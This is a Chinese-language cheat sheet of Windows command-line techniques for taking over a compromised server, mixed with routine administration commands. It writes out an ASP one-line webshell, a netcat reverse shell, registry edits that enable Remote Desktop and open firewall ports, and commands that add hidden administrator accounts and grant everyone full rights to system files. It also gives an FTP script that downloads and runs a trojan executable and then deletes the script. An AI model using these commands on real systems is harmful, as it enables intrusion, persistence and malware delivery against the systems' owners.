Windows CMD
Windows常用系统命令
# Windows命令
### 一句话
echo ^<%eval request("#")%^> > D:\h4ck.asp
### 文件夹操作
Md hackdir #创建
Rd hackdir #删除
Dir c:\ #查看c盘根目录全部文件夹和文件信息
Tree e:\ #显示e盘文件目录树
### 文本操作
Type d:\wwwroot\hack.asp 查看一句话木马的内容
Del d:\wwwroot\hack.asp 删除hack.asp
### nc
本地 nc -vv -p -l 1234
服务器 nc -e cmd路径 ip 1234
### 远程桌面端口
1.查询终端3389端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.开启2003终端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.更改终端端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5.解决终端超出了最大连接数的命令
mstsc /v:ip:3389 /console
administrator默认不允许,远程的情况下,需将用户加入"Remote Desktop Users"组。
net user xxx pppp /add &net localgroup administrators xxx /add
net localgroup administrators xxx /add
net localgroup "Remote Desktop Users" xxx /add 远程桌面用户允许设置。
### 防火墙
net stop sharedacess关闭防火墙
net stop PolicyAgent关闭筛选策略
#禁用TCP/IP端口筛选,需重启
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
### 进程操作
tasklist /svc #查看进程
taskkill pid #关掉进程
taskkill /im 进程名 /f #关掉进程
ntsd -c q -p PID 强制结束运行进程
### 用户操作
query user 查询登陆用户
logoff ID 蹬出某用户
net user 查看所有用户
net user 1 1 /add
net1 localgroup administrators 1 /add
net1 user guest /active:yes #启用用户
### 系统权限
whoami #查看全系统权限
cacls.exe c:\windows\system32\net.exe /t /e /g everyone:f #调系统权限
### FTP命令行下加账号
C:\>ftp
ftp> open 192.168.0.22
ftp> quote site exec net.exe user admin$ jinwei58 /add
ftp> quote site exec net.exe localgroup admin$ /add
200 EXEC command successful (TID=33).
ftp传马命令
echo open 自己的FTP > cmd.txt
echo 帐户>> cmd.txt
echo 密码>> cmd.txt
echo binary >> cmd.txt
echo get 木马.exe >> cmd.txt
echo bye >> cmd.txt
ftp -s:cmd.txt
木马.exe
del cmd.txt. /q
### 开启 telnet
@echo off
sc config tlntsvr start= auto
net start telnet
### 调整NTFS分区权限
cacls c: /e /t /g everyone:F #所有人对c盘都有一切权利
cacls %systemroot%\system32\*.exe /d everyone #拒绝所有人访问system32中exe文件
### 常用系统命令
gpedit.msc #计算机组策略
compmgmt.msc #计算机管理
devmgmt.msc #磁盘管理
fsmgmt.msc #共享管理
lusrmgr.msc #本地用户管理
notepad #写字板
services.msc #服务管理